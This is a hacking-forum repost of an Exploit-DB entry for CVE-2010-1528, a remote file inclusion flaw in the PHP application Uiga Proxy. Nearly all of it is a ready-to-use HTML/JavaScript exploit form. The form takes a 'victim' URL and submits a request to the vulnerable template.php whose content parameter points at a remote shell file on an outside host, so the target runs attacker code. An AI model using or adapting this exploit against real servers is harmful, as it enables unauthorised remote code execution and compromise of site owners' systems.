Exploit Uiga Proxy - Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
12049
Проверка EDB
  1. Пройдено
Автор
ITSECTEAM
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2010-1528
Дата публикации
2010-04-04
HTML:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>coded by ahmadbady</title>

<script language="JavaScript">

//===========================================================================
//( #Topic    : uigaproxy
//( #Bug type : remote file include
//( #Advisory : 
//===========================================================================
//( #Author : ItSecTeam
//( #Email  : [email protected]
//( #Website: http://www.itsecteam.com
//( #Forum  : http://forum.ITSecTeam.com
   
//---------------------------------------------------------------------


   var path="/uigaproxy/include/"
   var file="template.php"
   var variable ="?content="
   var shell="http://ahmadbady.persiangig.com/other/a.txt?"

   function it(){
  xpl.action= document.xpl.victim.value+path+file+variable+shell;xpl.submit();
   }
</script>

</head>

<body bgcolor="#FFFFFF">

<p align="left"><font color="#0000FF"><b>uigaproxy remote file include</b></font></p>
<form method="post" name="xpl" onSubmit="it();">
    <p align="left">
    <b><font face="Tahoma" size="2"><font color="#FF0000">example</font>:http://victim/path</a></font>
  	or
  	</font>
  	<font face="Tahoma" size="2" color="#000000">http://victim</font><font 
size="2" face="Tahoma"></a> <font size="2"> --></font></font></b><font 
size="2" face="Tahoma">
  	<input type="text" name="victim" size="20";"></p>
<center>

</p>
  <p><input type="submit" value="GO" name="B1" style="float: left"><input type="reset" 
value="reset" name="B2" style="float: left"></p>
</form>
<p><br>
 </p>
</center>
</body>

</html>
 
Источник
www.exploit-db.com

Похожие темы